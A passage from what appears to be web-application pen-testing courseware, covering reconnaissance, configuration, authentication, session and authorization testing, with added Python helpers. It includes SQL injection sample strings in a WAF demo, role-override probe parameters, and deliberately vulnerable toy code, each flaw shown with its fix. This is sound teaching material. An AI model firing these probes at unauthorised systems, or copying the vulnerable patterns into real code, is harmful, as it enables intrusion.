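    set(range(0, 10)) | {11, 12} | set(range(14, 32)) | {127}
    | set(range(175, 224)) | {255}
)
LEVELS: Dict[str, Set[int]] = {
    "None": set(),
    "Minimum": MINIMUM_BYTES,
    "Extended": MINIMUM_BYTES | {ord(c) for c in "<>'"},
    "Paranoid": MINIMUM_BYTES | {ord(c) for c in "<>'|"},
}


@dataclass
class Verdict:
    action: str        # "allow", "log" (suspect only) or "deny"
    reasons: List[str]


def inspect_value(value: str, level: str = "Minimum") -> Verdict:
    """Inspect one request parameter value and return the WAF decision."""
    reasons: List[str] = []
    # Stage 1: generic input sanitization by character class (ServerDefender style).
    bad = sorted({ord(ch) for ch in value if ord(ch) in LEVELS[level]})
    if bad:
        reasons.append(f"generic sanitization ({level}): bytes {bad}")
    # Stage 2: SQL-injection signature patterns (dotDefender style).
    for name, rx in SQLI_PATTERNS.items():
        if rx.search(value):
            reasons.append(f"SQL injection: {name}")
    if reasons:
        return Verdict("deny", reasons)   # "Deny and Log" in the screenshot
    if SUSPECT_SINGLE_QUOTE.search(value):
        # Low-confidence match: record it, but do not block legitimate names.
        return Verdict("log", ["SQL injection: Suspect Single Quote (Safe)"])
    return Verdict("allow", [])


if __name__ == "__main__":
    for sample in ("plain text 42", "O'Brien", "1' OR 1=1 --", "1 UNION SELECT @@version"):
        print(repr(sample), inspect_value(sample))
    # Raising the level blocks the apostrophe in a real surname: the trade-off
    # between Minimum and Extended/Paranoid is false positives on user data.
    print(repr("O'Brien"), "at Extended:", inspect_value("O'Brien", "Extended"))
```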
  • 235. Web Application Firewalls. Web application firewalls secure websites, web applications, and web services against known and unknown attacks. They prevent data theft and manipulation of sensitive corporate and customer information. Commonly used web application firewalls are listed as follows:
    - Radware's AppWall available at http://www.radware.com
    - ThreatSentry available at http://www.privacyware.com
    - QualysGuard WAF available at http://www.qualys.com
    - ThreatRadar available at http://www.imperva.com
    - ModSecurity available at http://www.modsecurity.org
    - Barracuda Web Application Firewall available at https://www.barracudanetworks.com
    - Stingray Application Firewall available at http://www.riverbed.com
    - IBM Security AppScan available at http://www-01.ibm.com
    - Trustwave WebDefend available at https://www.trustwave.com
    - Cyberoam's Web Application Firewall available at http://www.cyberoam.com
  • 236. Module Flow: Web App Concepts, Web App Threats, Hacking Methodology, Web Application Hacking Tools, Countermeasures, Security Tools, Web App Pen Testing. As mentioned previously, web applications are more vulnerable to attacks. Attackers use web applications as the sources for spreading attacks by turning them into malicious applications once compromised. Your web application may also become a victim of such attacks. Therefore, to avoid this situation, you should conduct penetration testing in order to determine the vulnerabilities before they are exploited by real attackers.
  • 237. Web applications can be compromised in many ways. This section describes how to conduct web application pen testing against all possible kinds of attacks.
  • 238. Web Application Pen Testing. Web application pen testing is used to identify, analyze, and report vulnerabilities such as input validation, buffer overflow, SQL injection, bypassing authentication, code execution, etc. in a given application. Web application pen testing is done to detect various security vulnerabilities and associated risks. As a pen tester, you should test your web application for vulnerabilities such as input validation, buffer overflow, SQL injection, bypassing authentication, code execution, etc. The best way to carry out a penetration test is to conduct a series of methodical and repeatable tests, and to work through all of the different application vulnerabilities. Web application pen testing helps in:
    - Identification of Ports: Scan the ports to identify the associated running services and analyze them through automated or manual tests to find weaknesses.
    - Verification of Vulnerabilities: To exploit the vulnerability in order to test and fix the issue.
    - Remediation of Vulnerabilities: To retest the solution against vulnerability to ensure that it is completely secure.
Web Application Pen Testing (Cont'd)

The general steps that you need to follow to conduct a web application penetration test are listed below. Each step is explained in detail in the sections that follow.

Step 1: Defining objective
Define the aim and scope of the penetration test before conducting it. This keeps the test moving in the right direction and makes clear which systems, accounts, and attack types are in scope.

Step 2: Information gathering
Gather as much information as possible about the target system or network.

Step 3: Configuration management testing
Many web application compromises occur because of improper configuration. Therefore, conduct configuration management testing. This also helps protect against known vulnerabilities by confirming that the latest updates are installed.

Step 4: Authentication testing
Test the authentication mechanism to understand how it works and to determine the possible ways of bypassing or abusing it.

Step 5: Session management testing
Perform session management testing to check the web application against attacks that are based on the session ID, such as session hijacking, session fixation, etc.

Step 6: Denial-of-service testing
Send a large volume of requests to the web application until the server becomes saturated, and analyze how the application behaves at that point. In this way you can test the web application against denial-of-service attacks. Because this test can take down production services, run it only with explicit authorization and within an agreed test window.

Step 7: Data validation testing
Failing to adopt a proper data validation method is the most common security weakness observed in web applications, and it leads directly to injection and scripting vulnerabilities. Hence, before an attacker finds those vulnerabilities and exploits the application, perform data validation testing and fix what you find.

Step 8: Business logic testing
Security flaws may be present even in the business logic of a web application. Hence, you should test the business logic for flaws. By exploiting business logic, attackers may do something that the business never intended to allow, which can lead to significant financial loss. Testing business logic for security flaws requires unconventional thinking, since automated scanners cannot understand what the application is supposed to do.

Step 9: Authorization testing
Analyze how the web application authorizes the user, and then try to find and exploit the vulnerabilities present in the authorization mechanism.

Step 10: Web services testing
Web services use the HTTP protocol in conjunction with XML, WSDL, SOAP, and UDDI technologies. Therefore, web services have XML/parser-related vulnerabilities in addition to SQL injection, information disclosure, etc. Conduct web services testing to determine the vulnerabilities of web-based services.

Step 11: AJAX testing
Though more responsive web applications are developed using AJAX, an AJAX application is likely to be at least as vulnerable as a traditional web application. Testing AJAX is challenging because developers have full freedom to design the way the client and server communicate, so the tester must first map the application's endpoints and message formats.

Step 12: Document all the findings
Once you have conducted all the tests mentioned here, document all the findings and the testing techniques employed at each step. Analyze the documentation, explain the current security posture to the concerned parties, and suggest how they can improve it.
Information Gathering

Let's get into detail and discuss each web application test step thoroughly. The first step in web application pen testing is information gathering. To gather all the information about the target application, follow these steps:

Step 1: Analyze the robots.txt file
robots.txt is a file that instructs web robots (crawlers) which directories of the website they are allowed and disallowed to visit. Because developers often list administrative or unfinished areas there to keep them out of search engines, analyze robots.txt and determine the allowed and disallowed directories of the web application. You can retrieve the robots.txt file using tools such as GNU Wget.

Step 2: Perform search engine reconnaissance
Use the advanced "site:" search operator and then click "Cached" to perform search engine reconnaissance. It gives you information such as the structure of the web application and the error pages it produces.

Step 3: Identify application entry points
Identify application entry points using tools such as WebScarab, Burp Proxy, OWASP ZAP, TamperIE (for Internet Explorer), or Tamper Data (for Firefox). Cookie information, 3xx and 4xx HTTP status codes, and 500 internal server errors may give clues about the entry points of the target web application.

Step 4: Identify the web applications
To identify web applications: probe for URLs, do dictionary-style searching (intelligent guessing), and perform port and vulnerability scanning using tools such as Nmap (port scanner) and Nessus. Techniques such as DNS zone transfers, DNS inverse queries, web-based DNS searches, and querying search engines (googling) reveal additional virtual hosts and applications on the same infrastructure. Check for old versions of files or other artifacts; old versions of files may give useful information that attackers can use to launch attacks on the web application.

Step 5: Analyze the output from HEAD and OPTIONS HTTP requests
Send HEAD and OPTIONS requests to the application and analyze the response headers (for example Server, X-Powered-By, and Allow). This may reveal information such as the web server software version, scripting environment, and OS in use.
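The following Python script is an added example for Steps 1 and 5 above; it is not part of the EC-Council courseware. It parses a robots.txt file into its allowed and disallowed paths, and pulls the fingerprinting clues (Server, X-Powered-By, cookie names, the Allow method list) out of raw HEAD and OPTIONS responses. The robots.txt text and both HTTP responses are constructed samples, and the host name example.test is a placeholder; only live_probe() touches the network, and only when you call it against an in-scope host.

```python
"""Added example: parse robots.txt and HEAD/OPTIONS responses for fingerprint clues."""
import http.client
import re

# Constructed robots.txt, typical of a site that hides an admin area from crawlers.
SAMPLE_ROBOTS = """\
User-agent: *
Disallow: /admin/
Disallow: /backup/
Allow: /public/
Sitemap: https://example.test/sitemap.xml
"""

# Constructed raw responses to HEAD / and OPTIONS /.
SAMPLE_HEAD = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache/2.2.22 (Ubuntu)\r\n"
    "X-Powered-By: PHP/5.3.10\r\n"
    "Set-Cookie: PHPSESSID=abc123; path=/\r\n"
    "Content-Type: text/html\r\n\r\n"
)
SAMPLE_OPTIONS = (
    "HTTP/1.1 200 OK\r\n"
    "Allow: GET,HEAD,POST,OPTIONS,TRACE\r\n"
    "Server: Apache/2.2.22 (Ubuntu)\r\n\r\n"
)

# Methods a production web application should normally not advertise.
RISKY_METHODS = {"TRACE", "PUT", "DELETE", "CONNECT"}


def parse_robots(text):
    """Return {'allow': [...], 'disallow': [...], 'sitemaps': [...]} from robots.txt text."""
    found = {"allow": [], "disallow": [], "sitemaps": []}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()          # drop comments and whitespace
        if ":" not in line:
            continue
        key, value = (part.strip() for part in line.split(":", 1))
        key = key.lower()
        if key == "disallow" and value:
            found["disallow"].append(value)
        elif key == "allow" and value:
            found["allow"].append(value)
        elif key == "sitemap":
            found["sitemaps"].append(value)
    return found


def parse_headers(raw_response):
    """Split a raw HTTP response into (status_line, {lower-cased header name: value})."""
    head = raw_response.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def fingerprint(head_response, options_response):
    """Collect server/platform clues and the advertised method list from the two responses."""
    _, head_hdrs = parse_headers(head_response)
    _, opt_hdrs = parse_headers(options_response)
    allowed = [m.strip().upper() for m in opt_hdrs.get("allow", "").split(",") if m.strip()]
    # Cookie names alone identify the platform: PHPSESSID (PHP), JSESSIONID (Java), ASP.NET_SessionId.
    cookie_names = re.findall(r"(?:^|,\s*)([^=;,\s]+)=", head_hdrs.get("set-cookie", ""))
    return {
        "server": head_hdrs.get("server"),
        "powered_by": head_hdrs.get("x-powered-by"),
        "cookies": cookie_names,
        "methods": allowed,
        "risky_methods": sorted(RISKY_METHODS.intersection(allowed)),
    }


def live_probe(host, path="/", port=80):
    """Issue real HEAD and OPTIONS requests to an in-scope host and fingerprint the answers."""
    results = {}
    for method in ("HEAD", "OPTIONS"):
        conn = http.client.HTTPConnection(host, port, timeout=10)
        conn.request(method, path)
        resp = conn.getresponse()
        raw = "HTTP/1.1 %d %s\r\n" % (resp.status, resp.reason)
        raw += "".join("%s: %s\r\n" % (k, v) for k, v in resp.getheaders()) + "\r\n"
        results[method] = raw
        conn.close()
    return fingerprint(results["HEAD"], results["OPTIONS"])


if __name__ == "__main__":
    print(parse_robots(SAMPLE_ROBOTS))
    print(fingerprint(SAMPLE_HEAD, SAMPLE_OPTIONS))
```

Every Disallow entry is a directory the owner did not want indexed, which makes it the first place to look for admin consoles and backups; the risky_methods list feeds directly into the HTTP methods test in the configuration management section.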
Information Gathering (Cont'd)

Step 6: Analyze error codes
Analyze error codes by requesting invalid pages and using alternate request methods (POST, PUT, and others) in order to collect information from the server that it does not intend to disclose. This may reveal software versions, details of the databases in use, bugs, and other technological components.

Step 7: Test for recognized file types/extensions/directories
Test for recognized file types, extensions, and directories by requesting common file extensions such as .ASP, .HTM, .PHP, and .EXE, and watch for any unusual output or error codes. This gives you an idea of the web application environment.

Step 8: Examine the source of available pages
Examine the source code of the accessible pages of the application front end, including HTML comments, script includes, and hidden form fields. This provides clues about the underlying application environment.

Step 9: TCP/ICMP and service fingerprinting
Perform TCP/ICMP and service fingerprinting using traditional fingerprinting tools such as Nmap and Queso, or the more recent application fingerprinting tool Amap. This gives you information about the web application's services and their associated ports.
Configuration Management Testing

Once you have gathered information about the web application environment, test the configuration management. This is important because improper configuration may allow unauthorized users to break into the web application even when the application code itself is sound.

Step 1: Perform SSL/TLS testing
Identify the ports associated with SSL/TLS-wrapped services with the help of tools such as Nmap and Nessus, and check the protocol versions and cipher suites each service accepts. Weak or obsolete settings can lead to the disclosure of confidential information in transit.

Step 2: Perform infrastructure configuration management testing
Perform network scanning and analyze web server banners to understand the infrastructure hosting the application. Misconfigured servers may serve application files as plain text, disclosing the source code of the application.

Step 3: Perform application configuration management testing
Test the configuration management of the application using CGI scanners and by reviewing the contents of the web server, application server, comments, configuration files, and logs. This may reveal information in the source code, log files, and default error pages.

Step 4: Test for file extension handling
Use vulnerability scanners, spidering and mirroring tools, search engine queries, or manual inspection to test how the server handles file extensions (for example, whether .inc, .bak, or .txt copies of scripts are served unprocessed). This may reveal confidential information such as access credentials.

Step 5: Verify the presence of old, backup, and unreferenced files
Review source code and enumerate application pages and functionality to find old, backup, and unreferenced files. These may reveal source code, installation paths, and passwords for applications and databases.

Step 6: Test for infrastructure and application admin interfaces
Perform directory and file enumeration, review server and application documentation, etc. to find infrastructure and application admin interfaces. An exposed admin interface, especially one with default credentials, can be used to gain access to admin functionality.

Step 7: Test for HTTP methods and XST
Review the methods advertised by the OPTIONS HTTP method using Netcat or Telnet, and check whether TRACE is enabled. With TRACE enabled, cross-site tracing (XST) can echo a request back to a script running in the victim's browser, exposing the cookies and credentials of legitimate users, including cookies marked HttpOnly.
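The following Python helpers are an added example for Steps 5 and 7 above, not code from the EC-Council courseware. generate_backup_candidates() turns a list of known page paths into the old, backup, and unreferenced names worth requesting; build_trace_request() and trace_echoes_request() implement the TRACE check, deciding from the raw response whether the server reflects request headers, which is what cross-site tracing depends on. The suffix list, the sample TRACE responses, and the host example.test are constructed; the caller is assumed to URL-encode candidate paths before requesting them.

```python
"""Added example: backup-file candidates (Step 5) and a TRACE/XST check (Step 7)."""
import posixpath
import secrets

# Suffixes and prefixes that editors, deploy scripts and admins commonly leave behind.
BACKUP_SUFFIXES = (".bak", ".old", ".orig", ".save", ".swp", ".tmp", "~", ".1", ".zip", ".tar.gz")
BACKUP_PREFIXES = (".", "Copy of ")      # "Copy of " needs %20 when requested


def generate_backup_candidates(known_paths):
    """Return an ordered, de-duplicated list of likely backup names for each known path."""
    candidates = []
    seen = set()

    def add(path):
        if path not in seen:
            seen.add(path)
            candidates.append(path)

    for path in known_paths:
        directory, name = posixpath.split(path)
        stem, ext = posixpath.splitext(name)
        for suffix in BACKUP_SUFFIXES:
            add(posixpath.join(directory, name + suffix))      # login.php.bak
            if ext:
                add(posixpath.join(directory, stem + suffix))  # login.bak
        for prefix in BACKUP_PREFIXES:
            add(posixpath.join(directory, prefix + name))      # .login.php
        add(posixpath.join(directory, name + ".txt"))          # login.php.txt, served unprocessed
    return candidates


def build_trace_request(host, path="/"):
    """Build a TRACE request carrying a random marker header; returns (marker, raw_request)."""
    marker = secrets.token_hex(8)
    raw = "TRACE %s HTTP/1.1\r\nHost: %s\r\nX-XST-Probe: %s\r\n\r\n" % (path, host, marker)
    return marker, raw


def trace_echoes_request(raw_response, marker):
    """True if a 200 TRACE response body reflects our marker header, i.e. TRACE is enabled."""
    head, _, body = raw_response.partition("\r\n\r\n")
    status_line = head.split("\r\n", 1)[0]
    if " 200 " not in status_line:
        return False
    return ("X-XST-Probe: %s" % marker) in body


# Constructed responses: one from a server with TRACE enabled (the body is the request
# echoed back with Content-Type message/http), one from a server that refuses it.
SAMPLE_MARKER = "0123456789abcdef"
SAMPLE_TRACE_RESPONSE = (
    "HTTP/1.1 200 OK\r\nContent-Type: message/http\r\n\r\n"
    "TRACE / HTTP/1.1\r\nHost: example.test\r\nX-XST-Probe: 0123456789abcdef\r\n\r\n"
)
SAMPLE_TRACE_DISABLED = "HTTP/1.1 405 Method Not Allowed\r\nAllow: GET,HEAD,POST\r\n\r\n"


if __name__ == "__main__":
    for candidate in generate_backup_candidates(["/admin/login.php"]):
        print(candidate)
    print("TRACE enabled:", trace_echoes_request(SAMPLE_TRACE_RESPONSE, SAMPLE_MARKER))
```

Send the raw request from build_trace_request() with Netcat and feed the reply to trace_echoes_request(); a reflected marker confirms TRACE. Note that current browsers refuse to issue TRACE from script, so an enabled TRACE is reported today as a hardening finding rather than a directly exploitable cookie theft.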
Authentication Testing

Perform the following steps to carry out authentication testing:

Step 1: Test for vulnerable "remember password" and password reset functions
Attempt to reset passwords by guessing, social engineering, or cracking the secret questions, if they are used. Check whether a "remember my password" mechanism is implemented by inspecting the HTML code of the login page; a remembered password or long-lived token stored on the client can expose an authentication weakness.

Step 2: Test for logout and browser cache management
Check whether it is possible to "reuse" a session after logout. Also check whether the application automatically logs out a user who has been idle for a certain amount of time, and that no sensitive data remains stored in the browser cache after logout.

Step 3: Test for CAPTCHA
Identify all parameters that are sent from the client to the server in addition to the decoded CAPTCHA value, and try to send an old decoded CAPTCHA value with an old CAPTCHA ID or an old session ID. If the server accepts it, the CAPTCHA can be replayed and offers no protection against automated authentication attacks.

Step 4: Test for multiple-factor authentication
Check whether users hold a hardware device of some kind in addition to the password. Check whether the hardware device communicates directly and independently with the authentication infrastructure using an additional communication channel; a second factor that travels through the same channel as the password can be phished or intercepted together with it.

Step 5: Test for race conditions
Attempt to force a race condition by making multiple simultaneous requests while observing the outcome for unexpected behavior, such as a one-time code or limit being accepted more than once. Perform code review to check whether the code has windows (check-then-act sequences) in which race conditions can occur.
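The following Python harness is an added example for Step 5, not code from the EC-Council courseware. race() releases a set of worker threads at the same instant with a Barrier and collects what each one got back. It is run here against a constructed, deliberately vulnerable one-time-code service (check the code, pause as a database round trip would, then mark it used) and against a hardened version that makes the check and the update one atomic step; against a real target the action passed to race() would be an HTTP request to the login or code-redemption endpoint instead.

```python
"""Added example: a simultaneous-request harness applied to a check-then-act race."""
import threading
import time


class OneTimeCodeService:
    """Constructed stand-in for an endpoint that should accept a one-time code exactly once."""

    def __init__(self, valid_code, locked):
        self.valid_code = valid_code
        self.used = set()
        self.locked = locked
        self._lock = threading.Lock()

    def _check_and_mark(self, code):
        if code != self.valid_code or code in self.used:
            return False
        time.sleep(0.05)                # the window: DB round trip between check and update
        self.used.add(code)
        return True

    def redeem(self, code):
        if self.locked:
            with self._lock:            # hardened: nobody else can pass the check meanwhile
                return self._check_and_mark(code)
        return self._check_and_mark(code)   # vulnerable: every concurrent caller passes the check


def race(action, workers=20):
    """Run action() in `workers` threads released simultaneously; return all results."""
    barrier = threading.Barrier(workers)
    results = []
    results_lock = threading.Lock()

    def worker():
        barrier.wait()                  # every thread starts the moment the last one arrives
        outcome = action()
        with results_lock:
            results.append(outcome)

    threads = [threading.Thread(target=worker) for _ in range(workers)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return results


def successful_redemptions(locked, workers=20):
    """How many of `workers` simultaneous redemptions of the same code succeed."""
    service = OneTimeCodeService(valid_code="482913", locked=locked)
    return sum(1 for ok in race(lambda: service.redeem("482913"), workers) if ok)


if __name__ == "__main__":
    print("vulnerable service accepted the code", successful_redemptions(locked=False), "times")
    print("hardened service accepted the code", successful_redemptions(locked=True), "time(s)")
```

The same harness applied to a password-reset token, a coupon code, or a login-attempt counter shows whether the server enforces its once-only or at-most-N rule under concurrency; on the fix side, the lock in the hardened branch corresponds to a database transaction or a conditional update that marks the code used in the same statement that checks it.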
Session Management Testing

After testing the configuration management and authentication, test how the application manages the session. The following are the steps to conduct session management pen testing:

Step 1: Test for the session management schema
Collect a sufficient number of cookie samples, analyze the cookie generation algorithm, and try to forge a valid cookie. If the session identifier is predictable (sequential, time-based, or derived from the user name), cookie tampering lets an attacker hijack the sessions of legitimate users.

Step 2: Test for cookie attributes
Test for cookie attributes (Secure, HttpOnly, Domain, Path, and Expires) using intercepting proxies such as WebScarab, Burp Proxy, OWASP ZAP, or traffic-intercepting browser plug-ins such as TamperIE (for IE) and Tamper Data (for Firefox). A session cookie that is sent over plain HTTP or is readable by script can be retrieved and used to hijack a valid session.

Step 3: Test for session fixation
To test for session fixation, make a request to the site before logging in, note the session identifier issued, and check whether the same identifier remains valid after authentication; the WebScarab tool can be used to analyze the exchange. An application that does not issue a new session ID at login allows an attacker to steal the user's session (session hijacking) by planting a known ID beforehand.

Step 4: Test for exposed session variables
Disclosure of the session token leads to a session replay attack. Therefore, test for exposed session variables by inspecting the encryption and reuse of the session token, proxies and caching, GET versus POST (tokens in URLs end up in logs and Referer headers), and transport vulnerabilities.

Step 5: Test for CSRF (Cross-Site Request Forgery)
Examine the URLs in the restricted area to test for CSRF: check whether state-changing requests can be reproduced without an unpredictable, session-bound token. A CSRF attack compromises end-user data and operations, or the entire web application if an administrator is targeted.
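The following Python functions are an added example for Steps 1 and 2 above, not code from the EC-Council courseware. audit_set_cookie() reports the attributes missing from a captured Set-Cookie header, and looks_sequential() and looks_time_based() are two of the cheap predictability tests a tester runs over a batch of collected session identifiers before investing in a full statistical analysis. All cookie headers and token samples below are constructed.

```python
"""Added example: cookie attribute audit and quick session-token predictability checks."""
import base64
import re
import time

# Constructed Set-Cookie headers as an intercepting proxy would capture them.
WEAK_COOKIE = "PHPSESSID=000c5a2e; path=/"
STRONG_COOKIE = "sid=Q2nK8yTz0w1p; Path=/; Secure; HttpOnly; SameSite=Lax"

# Constructed token batches: sequential hex counter, random, and base64(user:timestamp).
SEQ_TOKENS = ["000c5a2e", "000c5a2f", "000c5a31", "000c5a34"]
RANDOM_TOKENS = ["Q2nK8yTz0w1p", "u7Ga0mL3xR9v", "bZ4kT1eW9hQ2"]
TIME_TOKENS = [base64.b64encode(b"alice:1350000000").decode()]


def audit_set_cookie(header):
    """Return a list of findings for one Set-Cookie header value; empty means nothing to report."""
    parts = [p.strip() for p in header.split(";")]
    name = parts[0].split("=", 1)[0]
    attrs = {}
    for part in parts[1:]:
        key, _, value = part.partition("=")
        attrs[key.strip().lower()] = value.strip()
    findings = []
    if "secure" not in attrs:
        findings.append("%s: missing Secure (sent over plain HTTP)" % name)
    if "httponly" not in attrs:
        findings.append("%s: missing HttpOnly (readable by script, e.g. via XSS)" % name)
    if "samesite" not in attrs:
        findings.append("%s: missing SameSite (sent on cross-site requests, aids CSRF)" % name)
    if "expires" in attrs or "max-age" in attrs:
        findings.append("%s: persistent session cookie (survives browser close)" % name)
    return findings


def _to_int(token):
    """Interpret a token as hex, then decimal; None if it is neither."""
    for base in (16, 10):
        try:
            return int(token, base)
        except ValueError:
            pass
    return None


def looks_sequential(tokens, max_gap=1000):
    """True if consecutive samples decode to integers that only ever grow by a small step."""
    values = [_to_int(t) for t in tokens]
    if len(values) < 3 or any(v is None for v in values):
        return False
    gaps = [b - a for a, b in zip(values, values[1:])]
    return all(0 < g <= max_gap for g in gaps)


def looks_time_based(tokens, now=None, window_days=365):
    """True if any token (raw or base64-decoded) embeds a Unix timestamp near `now`."""
    now = now or time.time()
    for token in tokens:
        candidates = [token]
        try:
            padded = token + "=" * (-len(token) % 4)
            candidates.append(base64.b64decode(padded, validate=False).decode("latin-1"))
        except Exception:
            pass                                       # not base64, analyse the raw form only
        for text in candidates:
            for digits in re.findall(r"\d{10}", text):
                if abs(int(digits) - now) < window_days * 86400:
                    return True
    return False


if __name__ == "__main__":
    print(audit_set_cookie(WEAK_COOKIE))
    print("sequential:", looks_sequential(SEQ_TOKENS), "time-based:", looks_time_based(TIME_TOKENS, now=1350000500))
```

A batch that passes both checks is not proven random; it only earns the longer analysis (Burp Sequencer or a similar entropy test over a few thousand samples). A batch that fails either check is already a finding, because an attacker can forge the next identifier without any further knowledge.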
  • 250. Authorization Testing

Follow the steps here to test the web application against authorization vulnerabilities:

Step 1: Test for path traversal
Test for path traversal by performing input vector enumeration and analyzing the input validation functions present in the web application. Path traversal allows attackers to gain access to reserved information.

Step 2: Test for bypassing the authorization schema
Test for bypassing the authorization schema by examining the admin functionalities, to gain access to the resources assigned to a different role. If the attacker succeeds in bypassing the authorization schema, he or she can gain illegal access to reserved functions/resources.

Step 3: Test for privilege escalation
Test for role/privilege manipulation. If the attacker has access to resources/functionality, then he or she can perform a privilege escalation attack.
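Steps 2 and 3 are most reliably run as a matrix: every restricted endpoint requested as every role, with the results compared against the documented access policy. The following is an added example and not part of the courseware; toy_app is a constructed in-memory stand-in for the target whose /admin/export handler deliberately trusts a client-supplied role parameter (the role manipulation flaw step 3 looks for), and toy_app_fixed shows the corrected handler. All endpoint names, roles and helper names are hypothetical.

```python
# Roles ordered by privilege; the policy states the minimum role each endpoint needs.
ROLE_RANK = {"anonymous": 0, "user": 1, "admin": 2}
POLICY = {
    "/profile": "user",
    "/admin/users": "admin",
    "/admin/export": "admin",
}


def toy_app(path, session_role, params=None):
    """Constructed stand-in for the web application; returns an HTTP-like status."""
    params = params or {}
    if path == "/profile":
        return 200 if ROLE_RANK[session_role] >= ROLE_RANK["user"] else 403
    if path == "/admin/users":
        return 200 if session_role == "admin" else 403
    if path == "/admin/export":
        # Flaw: a role supplied by the client overrides the server-side session role.
        effective = params.get("role", session_role)
        return 200 if effective == "admin" else 403
    return 404


def toy_app_fixed(path, session_role, params=None):
    """Corrected version: privilege is taken from the server-side session only."""
    if path == "/admin/export":
        return 200 if session_role == "admin" else 403
    return toy_app(path, session_role, params)


def authz_matrix(app, policy, roles, params=None):
    """Step 2: request each endpoint as each role; return accesses the policy forbids."""
    violations = []
    for path, required in policy.items():
        for role in roles:
            status = app(path, role, params)
            allowed = ROLE_RANK[role] >= ROLE_RANK[required]
            if status == 200 and not allowed:
                violations.append((path, role, dict(params or {})))
    return violations


# Client-side privilege hints a tester appends to otherwise legitimate requests.
CANDIDATE_OVERRIDES = [{"role": "admin"}, {"admin": "true"}, {"uid": "1"}]


def role_manipulation_test(app, policy, roles):
    """Step 3: rerun the matrix with each candidate override and collect bypasses."""
    found = []
    for override in CANDIDATE_OVERRIDES:
        found.extend(authz_matrix(app, policy, roles, override))
    return found
```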
  • 251. Data Validation Testing

Web applications must employ proper data validation methods. Otherwise, there may be a chance for the attacker to break into the communication between the client and the server, and inject malicious data. Hence, data validation pen testing must be conducted to ensure that the current data validation methods or techniques employed by the web application offer appropriate security. Follow the steps here to perform data validation testing:

Step 1: Test for reflected cross-site scripting
A reflected cross-site scripting attacker crafts a URL to exploit the reflected XSS vulnerability and sends it to the client in a spam mail. If the victim clicks on the link, considering it as from a trusted server, the malicious script embedded by the attacker in the URL gets executed in the victim's browser and sends the victim's session cookie to the attacker. Using this session cookie, the attacker can steal the sensitive information of the victim. Hence, to avoid this kind of attack you must check your web applications against reflected XSS attacks. If you put proper data validation mechanisms or methods in place, then you can determine easily whether the URL came originally from the server or was crafted by the attacker.

Detect and analyze input vectors for potential vulnerabilities, analyze the vulnerability report, and attempt to exploit it. Use tools such as OWASP CAL9000, Hackvertor, BeEF, XSS-Proxy, Backframe, WebScarab, XSS Assistant, and Burp Proxy.
  • 252. Step 2: Test for stored cross-site scripting
Analyze HTML code, test for stored XSS, leverage stored XSS, and verify whether the file upload allows setting arbitrary MIME types, using tools such as OWASP CAL9000, Hackvertor, BeEF, XSS-Proxy, Backframe, WebScarab, Burp, and XSS Assistant. Stored XSS attacks allow attackers to uncover sensitive information such as session authorization tokens.

Step 3: Test for DOM-based cross-site scripting
DOM XSS stands for document object model based cross-site scripting, an attack that affects the client's browser script code. In this attack, the input is taken from the user and then some malicious action is performed with it, which in turn leads to the execution of injected malicious code. Web applications can be tested against DOM XSS attacks by performing source code analysis to identify JavaScript coding errors.

Step 4: Test for cross-site flashing
Analyze SWF files using tools such as SWFIntruder, Decompiler - Flare, Compiler - MTASC, Disassembler - Flasm, Swfmill, and the debugger version of the Flash Plugin/Player. Flawed Flash applications may contain DOM-based XSS vulnerabilities. The test for cross-site flashing gives information on DOM-based cross-site scripting vulnerabilities.

Step 5: Perform SQL injection testing
Perform standard SQL injection testing, union query SQL injection testing, blind SQL injection testing, and stored procedure injection using tools such as OWASP SQLiX, sqlninja, SqlDumper, sqlbftools, SQL Power Injector, etc. SQL injection attacks give database information to the attacker.

Step 6: Perform LDAP injection testing
Use a trial and error approach by inserting '(', '|', and other special characters in order to check the application for errors. Use the tool Softerra LDAP Browser. LDAP injection may reveal sensitive information about users and hosts.
  • 253. Data Validation Testing (Cont'd)

Step 7: Perform ORM injection testing
Perform ORM injection testing to discover vulnerabilities of an ORM tool and test web applications that use ORM. Use tools such as Hibernate, NHibernate, and Ruby on Rails. This test gives information on SQL injection vulnerabilities.

Step 8: Perform XML injection testing
To perform XML injection testing, try to insert XML metacharacters and observe the response. A successful XML injection may give information about the XML structure.

Step 9: Perform SSI injection testing
Perform SSI injection testing and find out whether the web server actually supports SSI directives, using tools such as the Burp Suite web proxy, Paros, WebScarab, and a string searcher such as grep. If the attacker can inject SSI directives, then he or she can set or print web server CGI environment variables.

Step 10: Perform XPath injection testing
Inject XPath code and interfere with the query result. XPath injection allows the attacker to access confidential information.
  • 254. Step 11: Perform IMAP/SMTP injection testing
Perform IMAP/SMTP injection testing to identify vulnerable parameters. Understand the data flow and deployment structure of the client, and perform IMAP/SMTP command injection. Malicious IMAP/SMTP commands allow attackers to access the backend mail server.
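Step 6 (LDAP) and step 10 (XPath) probe the same weakness: a query string assembled from user input, where a single metacharacter changes the query's structure. The following added example (not courseware code) shows the 'before' builders that the probe characters break, the escaping that fixes each, and a cheap structural check a tester can run on the filter the application produces; all function names are hypothetical.

```python
# RFC 4515 escapes for characters that are special inside an LDAP filter value.
LDAP_ESCAPES = {"\\": "\\5c", "*": "\\2a", "(": "\\28", ")": "\\29", "\x00": "\\00"}


def ldap_escape(value):
    return "".join(LDAP_ESCAPES.get(ch, ch) for ch in value)


def ldap_filter_vulnerable(username):
    """'Before': the probe characters '(' and '|' become filter syntax."""
    return f"(&(uid={username})(objectClass=person))"


def ldap_filter_safe(username):
    return f"(&(uid={ldap_escape(username)})(objectClass=person))"


def paren_balanced(filter_text):
    """Structural check on the filter the app builds: if user input leaves the
    parentheses unbalanced, the input is reaching the query as syntax."""
    depth = 0
    for ch in filter_text:
        if ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
        if depth < 0:
            return False
    return depth == 0


def xpath_string_literal(value):
    """XPath 1.0 has no escape sequence inside string literals, so pick the quote
    kind the value does not contain, or splice both kinds with concat()."""
    if "'" not in value:
        return f"'{value}'"
    if '"' not in value:
        return f'"{value}"'
    parts = value.split("'")
    return "concat(" + ", \"'\", ".join(f"'{p}'" for p in parts) + ")"


def xpath_vulnerable(user, pw):
    """'Before': a quote in either value ends the literal and rewrites the predicate."""
    return f"//user[name='{user}' and password='{pw}']"


def xpath_safe(user, pw):
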